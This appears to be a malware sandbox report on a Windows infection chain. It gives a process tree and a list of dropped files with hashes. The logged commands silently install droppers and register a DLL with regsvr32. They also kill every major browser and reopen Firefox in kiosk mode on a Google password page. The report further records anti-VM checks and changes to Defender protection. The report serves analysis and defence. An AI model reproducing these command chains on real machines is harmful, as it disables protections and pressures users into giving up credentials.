                                                                      "cmd.exe" /C timeout /T 3 & "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                      6⤵
                                                                      • Loads dropped DLL
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:2464
                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                        timeout /T 3
                                                                        7⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Delays execution with timeout.exe
                                                                        PID:824
                                                                      • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1124
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-77A2L.tmp\FunnyJellyfish.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-77A2L.tmp\FunnyJellyfish.tmp" /SL5="$30190,1097818,140800,C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe" /VERYSILENT /SUPPRESSMSGBOXES
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:1656
                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                            "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                                                                            9⤵
                                                                            • Loads dropped DLL
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:2996
                                                                            • C:\Windows\system32\regsvr32.exe
                                                                              /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\DelightfulCard.dll"
                                                                              10⤵
                                                                              • Loads dropped DLL
                                                                              PID:1064
                                                                • C:\Users\Admin\AppData\Local\Temp\1008011001\fc1e58f088.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1008011001\fc1e58f088.exe"
                                                                  4⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Modifies system certificate store
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:2988
                                                                • C:\Users\Admin\AppData\Local\Temp\1008012001\e31bf4a2ee.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1008012001\e31bf4a2ee.exe"
                                                                  4⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:1952
                                                                • C:\Users\Admin\AppData\Local\Temp\1008013001\788f72d2ea.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\1008013001\788f72d2ea.exe"
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  • Suspicious use of SendNotifyMessage
                                                                  PID:664
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /F /IM firefox.exe /T
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1568
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /F /IM chrome.exe /T
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1944
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /F /IM msedge.exe /T
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1188
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /F /IM opera.exe /T
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1144
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /F /IM brave.exe /T
                                                                    5⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    • Kills process with taskkill
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1584
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                    5⤵
                                                                      PID:756
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                        6⤵
                                                                        • Checks processor information in registry
                                                                        • Modifies registry class
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:1888
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1888.0.1291417010\1937356394" -parentBuildID 20221007134813 -prefsHandle 1256 -prefMapHandle 1248 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3cdc429b-1b9f-4263-919c-b45913bcaff3} 1888 "\\.\pipe\gecko-crash-server-pipe.1888" 1320 10dfa258 gpu
                                                                          7⤵
                                                                            PID:2588
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1888.1.845410856\1029057734" -parentBuildID 20221007134813 -prefsHandle 1508 -prefMapHandle 1504 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab783210-ba84-497f-958b-92e090b7e06b} 1888 "\\.\pipe\gecko-crash-server-pipe.1888" 1520 10d0a858 socket
                                                                            7⤵
                                                                              PID:2464
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1888.2.1055273777\1191666103" -childID 1 -isForBrowser -prefsHandle 2152 -prefMapHandle 2148 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 820 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d41f55f-0915-4885-919a-7590278ec32a} 1888 "\\.\pipe\gecko-crash-server-pipe.1888" 2164 18ad7258 tab
                                                                              7⤵
                                                                                PID:3024
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1888.3.1061130150\476192155" -childID 2 -isForBrowser -prefsHandle 728 -prefMapHandle 624 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 820 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6176f15f-1977-4826-a873-7cfe91d95a40} 1888 "\\.\pipe\gecko-crash-server-pipe.1888" 2664 1776f558 tab
                                                                                7⤵
                                                                                  PID:2680
                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1888.4.1779727504\1327152934" -childID 3 -isForBrowser -prefsHandle 3756 -prefMapHandle 3752 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 820 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a79a7003-2e17-4d22-af14-95c5f394d5f6} 1888 "\\.\pipe\gecko-crash-server-pipe.1888" 3768 1eb34a58 tab
                                                                                  7⤵
                                                                                    PID:2460
                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1888.5.1900712047\1961146232" -childID 4 -isForBrowser -prefsHandle 3892 -prefMapHandle 3896 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 820 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {654243c1-34bb-4745-926c-156050e37d03} 1888 "\\.\pipe\gecko-crash-server-pipe.1888" 3880 1eb33858 tab
                                                                                    7⤵
                                                                                      PID:1708
                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1888.6.40026863\426025970" -childID 5 -isForBrowser -prefsHandle 4084 -prefMapHandle 4088 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 820 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3937a966-f601-420d-aa67-344d6c8a7a0b} 1888 "\\.\pipe\gecko-crash-server-pipe.1888" 4072 1eb34758 tab
                                                                                      7⤵
                                                                                        PID:1476
                                                                                • C:\Users\Admin\AppData\Local\Temp\1008014001\eaa5b0bfff.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\1008014001\eaa5b0bfff.exe"
                                                                                  4⤵
                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Checks BIOS information in registry
                                                                                  • Executes dropped EXE
                                                                                  • Identifies Wine through registry keys
                                                                                  • Windows security modification
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3484
                                                                          • C:\Windows\system32\conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe "-10575121034781682785369961191976883849-306540495272652915-20485346061986274070"
                                                                            1⤵
                                                                              PID:4724
                                                                            • C:\Windows\system32\conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe "-21407949051877600304108662613-907980853-1154879227209348394129229638352918274"
                                                                              1⤵
                                                                                PID:4832
                                                                              • C:\Windows\system32\conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe "-1477161082-1190663884-794302232-1137588594179156739-1564759320798312764-1173797660"
                                                                                1⤵
                                                                                  PID:4292
                                                                                • C:\Windows\system32\conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe "15038479941219655987-995007851-20678539012057572682-1329478487-1126413896721740272"
                                                                                  1⤵
                                                                                    PID:4512
                                                                                  • C:\Windows\system32\conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe "-43347603411378068714298772121606027858-1914206889107772704016334564301641195515"
                                                                                    1⤵
                                                                                      PID:3524
                                                                                    • C:\Windows\system32\conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe "1483237128-1059688953-64534785-1335527571475957287-126659615-850419340-1844062523"
                                                                                      1⤵
                                                                                        PID:3356
                                                                                      • C:\Windows\system32\conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe "1065084893-375750797463803255-282530967-76367623-1022945881412545819-1410819231"
                                                                                        1⤵
                                                                                          PID:4496
                                                                                        • C:\Windows\system32\conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe "-203372429353314622385687168169298900817876349549026184-625722346-1857626537"
                                                                                          1⤵
                                                                                            PID:4172
                                                                                          • C:\Windows\system32\conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe "-1338099203-709647258-12513666631668800259-1205473617-4169431002061236545-522860110"
                                                                                            1⤵
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:664

                                                                                          Network

                                                                                          MITRE ATT&CK Enterprise v15

                                                                                          Replay Monitor

                                                                                          Loading Replay Monitor...

                                                                                          Downloads

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1

                                                                                            Filesize

                                                                                            264KB

                                                                                            MD5

                                                                                            f50f89a0a91564d0b8a211f8921aa7de

                                                                                            SHA1

                                                                                            112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                            SHA256

                                                                                            b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                            SHA512

                                                                                            bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\CURRENT

                                                                                            Filesize

                                                                                            16B

                                                                                            MD5

                                                                                            18e723571b00fb1694a3bad6c78e4054

                                                                                            SHA1

                                                                                            afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                                                                            SHA256

                                                                                            8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                                                                            SHA512

                                                                                            43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\activity-stream.discovery_stream.json.tmp

                                                                                            Filesize

                                                                                            23KB

                                                                                            MD5

                                                                                            fd8458fb22295cc66588b0b3e2d72441

                                                                                            SHA1

                                                                                            f31ef481acd01bdeda25c99776b67433e7e15bc0

                                                                                            SHA256

                                                                                            ee827ba61087d20d8443c0c1ebac218b133186945a6ded8bd2d410a8d674542c

                                                                                            SHA512

                                                                                            1339546a2ddc8ced85f2671bb8cdfcc0bae4b99e1981d7a6319a5b9e20ebbf8025f0bc389b65ad8026da6793ce1eb05b419c61877e0191d7fb0d4a32622c24eb

                                                                                          • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                                                            Filesize

                                                                                            13KB

                                                                                            MD5

                                                                                            f99b4984bd93547ff4ab09d35b9ed6d5

                                                                                            SHA1

                                                                                            73bf4d313cb094bb6ead04460da9547106794007

                                                                                            SHA256

                                                                                            402571262fd1f6dca336f822ceb0ec2a368a25dfe2f4bfa13b45c983e88b6069

                                                                                            SHA512

                                                                                            cd0ed84a24d3faae94290aca1b5ef65eef4cfba8a983da9f88ee3268fc611484a72bd44ca0947c0ca8de174619debae4604e15e4b2c364e636424ba1d37e1759

                                                                                          • C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe

                                                                                            Filesize

                                                                                            1.8MB

                                                                                            MD5

                                                                                            fa351b72ffb13bfc332a25a57a7f075f

                                                                                            SHA1

                                                                                            5af49613c179bed23dd43d76aedbe3d1b63004a3

                                                                                            SHA256

                                                                                            d2c90431f09fc7818c5afb43bbec077fc29544ddcb786bc655a82d1c33e20cdc

                                                                                            SHA512

                                                                                            de49eeaa695f9d6252bd3b547689b0e648999c7ee68d2e16a3d073d88505a1c6b0a4da538db7ce52653bfc2dc89a13dd07c894f8e28f9227f1d1c92df67216f9

                                                                                          • C:\Users\Admin\AppData\Local\Temp\1007999001\a75a31f719.exe

                                                                                            Filesize

                                                                                            4.2MB

                                                                                            MD5

                                                                                            40cb4053a584486a21a109ffb44933c9

                                                                                            SHA1

                                                                                            07a94039a6176646ecdb0a5b0fab59b632bdbd18

                                                                                            SHA256

                                                                                            71b2a45658b6d8df33fc9bacc2c938ec598db52f8a477d859632d774802c0d84

                                                                                            SHA512

                                                                                            58356679459f0c4126905cb2603c21fcc77f84c338ed8f03bd9639027c1e47475a09e4d2617aff5b695caf0915c36b59570e2572b64142dd76701c8ddc0fffd3

                                                                                          • C:\Users\Admin\AppData\Local\Temp\1008005001\file.exe

                                                                                            Filesize

                                                                                            50KB

                                                                                            MD5

                                                                                            666248c216a3f63828f739839230f9f6

                                                                                            SHA1

                                                                                            13690837235053762a538b4c5b2b601ec9f6bb22

                                                                                            SHA256

                                                                                            00655d1ac19f7ffeab812a77f9b85f07fced78e7eb27c641b0e0ce25f16963da

                                                                                            SHA512

                                                                                            37e57468a080dbb33ee480ae63d80939ff06050035f168630ba1d8e220e1b4859f78f897a12ba83a514bc97ed7927ee01c6fcca67fbaf479294a529302f7bdde

                                                                                          • C:\Users\Admin\AppData\Local\Temp\1008010001\FunnyJellyfish.exe

                                                                                            Filesize

                                                                                            1.4MB

                                                                                            MD5

                                                                                            e1cf72329542de8b3004517ee07d8371

                                                                                            SHA1

                                                                                            c22ac1f279cc11dffd30a41863181da598231d4b

                                                                                            SHA256

                                                                                            301e56052cf570110e66a429c0acc2454569ff5f966af0e809bef33eb2e02baa

                                                                                            SHA512

                                                                                            7267aa2244edd22b4ceda89e8e188180bcc409320f77b0d9fc9fbb63c0906ab23dc9dff4bd5e02018aa08194cb8bb8dcd0b28ae1c44b2497a13bb21411ec6edc

                                                                                          • C:\Users\Admin\AppData\Local\Temp\1008011001\fc1e58f088.exe

                                                                                            Filesize

                                                                                            1.8MB

                                                                                            MD5

                                                                                            7c3f6cc60781f4b73188bb0a06a7b0d9

                                                                                            SHA1

                                                                                            4d6dfbca12da9b49694aaa697a7dda3574cb6196

                                                                                            SHA256

                                                                                            66e70f6ec76a2a0805745110846f007e69cc54021a6ebb11a1ebe55e2e50d607

                                                                                            SHA512

                                                                                            ccc6582d0062101e2beb8f57011a57aba9d728383def4818c5831580db4ac803508c900dc9daa26321a170935d5d7b1ce7c7a6d1a415ed6bbebbc11ef9b911db

                                                                                          • C:\Users\Admin\AppData\Local\Temp\1008012001\e31bf4a2ee.exe

                                                                                            Filesize

                                                                                            1.7MB

                                                                                            MD5

                                                                                            7b407627037c3c9873d0a4b806519384

                                                                                            SHA1

                                                                                            3c6d470f6d3f29086d4ba50baae4a4dda0c4e20b

                                                                                            SHA256

                                                                                            2dae1d172d9d9387bd70c9524d8a0c464a13f03bf0d7c1c6d5f5f1826a6cd4b9

                                                                                            SHA512

                                                                                            278bc7f0458dd9fcf73053c52484a67091a0974f0af2ab28165187d6330729e4335214a0a9b905e3240bdb82ee8d5a47f1ca971b9a8aa204218f8fcfbb51cf6c

                                                                                          • C:\Users\Admin\AppData\Local\Temp\1008013001\788f72d2ea.exe

                                                                                            Filesize

                                                                                            901KB

                                                                                            MD5

                                                                                            f9ebc264db6c0d8351cb0be0da51a834

                                                                                            SHA1

                                                                                            8c3acda5cb40507905023e5cb1025e15620350b2

                                                                                            SHA256

                                                                                            41a734a6d39201860f3be6c8765bb256716e2b1f6c73e58e9b46c66fd5009262

                                                                                            SHA512

                                                                                            825e59af5045675f0d404e8ed1231b48672996f66046d2439fd6bc7958cb6856e7d33f8e3b56d2a353b7360e9a26f63b18822e14ce08cbffe93920f53026b846

                                                                                          • C:\Users\Admin\AppData\Local\Temp\1008014001\eaa5b0bfff.exe

                                                                                            Filesize

                                                                                            2.7MB

                                                                                            MD5

                                                                                            9fdc0979f1e3281023d6cfe460a2912c

                                                                                            SHA1

                                                                                            a8027a48aca67f37524c3624985ce49cacc79c3a

                                                                                            SHA256

                                                                                            3e185ed3062afd0e280c05f93c257729fcc2d46cf71626b299e3f61ef870d27b

                                                                                            SHA512

                                                                                            0f0c12484679a4b3a06b92fc3ecab7a65ff775448af2fefee1e5d8f7b514435ad24bef38f140b27e6489ac335c96894a70928c5813fc33902327f8295085342c

                                                                                          • C:\Users\Admin\AppData\Local\Temp\CabF672.tmp

                                                                                            Filesize

                                                                                            70KB

                                                                                            MD5

                                                                                            49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                            SHA1

                                                                                            1723be06719828dda65ad804298d0431f6aff976

                                                                                            SHA256

                                                                                            b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                            SHA512

                                                                                            bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                                          • C:\Users\Admin\AppData\Local\Temp\TarF6A3.tmp

                                                                                            Filesize

                                                                                            181KB

                                                                                            MD5

                                                                                            4ea6026cf93ec6338144661bf1202cd1

                                                                                            SHA1

                                                                                            a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                                            SHA256

                                                                                            8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                                            SHA512

                                                                                            6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                                          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                            Filesize

                                                                                            1.8MB

                                                                                            MD5

                                                                                            da4b77594a6a31a9b1fcbabb65346fa5

                                                                                            SHA1

                                                                                            ba835cb96f1e3d8267a973d147a1ccbf80fbd3c4

                                                                                            SHA256

                                                                                            436b8a722f47bd6e0a927682f26f381f8a9851eeaeb90223f6948e08c63454e0

                                                                                            SHA512

                                                                                            c9b18ab6193c0e3d84ca93ea23338447e665785f4e6c9fc6b65cc6c9aa924118fcb0d3a26a61e43432ef25c5dc412912f7cd23068cdc22528c565f75061cb687

                                                                                          • C:\Users\Admin\AppData\Local\Temp\tempScript.js

                                                                                            Filesize

                                                                                            2KB

                                                                                            MD5

                                                                                            82f229d0c36b68073da70ef5958e425d

                                                                                            SHA1

                                                                                            2beb8cd227b49b1d119165d6e3d258ddb730387a

                                                                                            SHA256

                                                                                            0f2579fdb9cbaaec15015df17dbaafd73a9d7d3202321aba6a1c8479cac17394

                                                                                            SHA512

                                                                                            4553f11b61e2c1cb1ebf532e7417380a8a5c19121331b76894bf5d3605a905fa3f62b54d596a818709f28c49fd7eb1d880798907a84cac45ccff65ee93f9e970

                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                                                                                            Filesize

                                                                                            442KB

                                                                                            MD5

                                                                                            85430baed3398695717b0263807cf97c

                                                                                            SHA1

                                                                                            fffbee923cea216f50fce5d54219a188a5100f41

                                                                                            SHA256

                                                                                            a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                                                                                            SHA512

                                                                                            06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                                                                                          • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                                                                                            Filesize

                                                                                            8.0MB

                                                                                            MD5

                                                                                            a01c5ecd6108350ae23d2cddf0e77c17

                                                                                            SHA1

                                                                                            c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                                                                                            SHA256

                                                                                            345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                                                                                            SHA512

                                                                                            b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                                                                                          • C:\Users\Admin\AppData\Roaming\CMD.vbs

                                                                                            Filesize

                                                                                            27KB

                                                                                            MD5

                                                                                            238ec4d17050e1841e8e0171407c2260

                                                                                            SHA1

                                                                                            2c8c14b257641f1e1151c6303dabde01621314f2

                                                                                            SHA256

                                                                                            163c4066da47b2e8b7d3690a374c79856417de2e09c74c0e7c807cd0b5c4b8fb

                                                                                            SHA512

                                                                                            3eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102

                                                                                          • C:\Users\Admin\AppData\Roaming\DelightfulCard.dll

                                                                                            Filesize

                                                                                            2.6MB

                                                                                            MD5

                                                                                            985fef2b6872a1a94726dc3b7f1439de

                                                                                            SHA1

                                                                                            e221a5c4f2f222b665c932ab9b1f66189cee3315

                                                                                            SHA256

                                                                                            78ef7eacffaba55e653195fe37846375aeb51b164d80ad312afda54163da0622

                                                                                            SHA512

                                                                                            41678a3e117cb83e7b99a65a6d0dda86db57ac0441d84ca817d6e04fa3751d4035215e8cd50bcd86b7232d1c28620103264f3a677ac14513d1fa0d977ba94f39

                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C73S4RRF50QH1CUEHH75.temp

                                                                                            Filesize

                                                                                            7KB

                                                                                            MD5

                                                                                            80f26f17932b8debac70243d1cff574d

                                                                                            SHA1

                                                                                            3848ce4c1e1b83c18361f97b3b8fd265a5049e2d

                                                                                            SHA256

                                                                                            408e9665e07e5ea891a71877fc2ac5c84c5e850021b16a11120e0a5c97135ae1

                                                                                            SHA512

                                                                                            0db9c1e8b52fa9c15a8a5eb986f3d4cccb9875e0edf0d0537d62a7261f3e6586cb3664274b354fdba830fdbaf39826d0b050e1768d59202af88e34d86fc54c2a

                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\db\data.safe.bin

                                                                                            Filesize

                                                                                            2KB

                                                                                            MD5

                                                                                            3ca5399da263d8a468e88632a05ecf9e

                                                                                            SHA1

                                                                                            91381c5b8bda9f9cec595f7f162c6982b8ab6ec3

                                                                                            SHA256

                                                                                            0b0d7dff074be6cbfbbb6c4af0d1eb6a33b5e838d91f0eaa7fbab38df1713b39

                                                                                            SHA512

                                                                                            fd8e2bb4dd2ae37385a838b58eb22b3a72c8252626c7435d5f1363daf1a4570c600ae5ebe194409b92fbfeae326142a27239a2a982a187fc16a11e59d6c82b53

                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\17f9b99d-89c6-4bae-9e1b-7e9e9956b5b8

                                                                                            Filesize

                                                                                            745B

                                                                                            MD5

                                                                                            9492dddc03d03e32ab5887c1fceb4960

                                                                                            SHA1

                                                                                            8180d6624ea684163789e55b565c3f8ebe6f59fa

                                                                                            SHA256

                                                                                            2b0c79bc5691257471509a3aa32158ec1f025b4f856ff21528c494832816a72e

                                                                                            SHA512

                                                                                            b8a241dc9e689a75de29795a06ac8c8e5c25af73378f09234be39063a9b0ae1212a7b89fac35b85319d7fe3fad4c6142b1e405db8361c184df1594514772fa7e

                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\fc897174-f68f-47ca-a525-00db704c8e77

                                                                                            Filesize

                                                                                            12KB

                                                                                            MD5

                                                                                            3541057a7de8941b0f9ea7863e84549f

                                                                                            SHA1

                                                                                            1322cb845a368b539da301e91d1502da31c512ca

                                                                                            SHA256

                                                                                            9e50786cda11400db4faad7ddb3fbd3951f7d9b44853ee92dcfe3d2e8e7ea3b3

                                                                                            SHA512

                                                                                            b5449446be5b46ea0e830d7506be87fe4db7e0e512c5751179ee5fd229367b4c2128ddb2eae8305936dcbef323e68d1f334c0b1489dc661b148b3f5a185b795c

                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

                                                                                            Filesize

                                                                                            997KB

                                                                                            MD5

                                                                                            fe3355639648c417e8307c6d051e3e37

                                                                                            SHA1

                                                                                            f54602d4b4778da21bc97c7238fc66aa68c8ee34

                                                                                            SHA256

                                                                                            1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

                                                                                            SHA512

                                                                                            8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

                                                                                            Filesize

                                                                                            116B

                                                                                            MD5

                                                                                            3d33cdc0b3d281e67dd52e14435dd04f

                                                                                            SHA1

                                                                                            4db88689282fd4f9e9e6ab95fcbb23df6e6485db

                                                                                            SHA256

                                                                                            f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

                                                                                            SHA512

                                                                                            a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

                                                                                            Filesize

                                                                                            479B

                                                                                            MD5

                                                                                            49ddb419d96dceb9069018535fb2e2fc

                                                                                            SHA1

                                                                                            62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

                                                                                            SHA256

                                                                                            2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

                                                                                            SHA512

                                                                                            48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

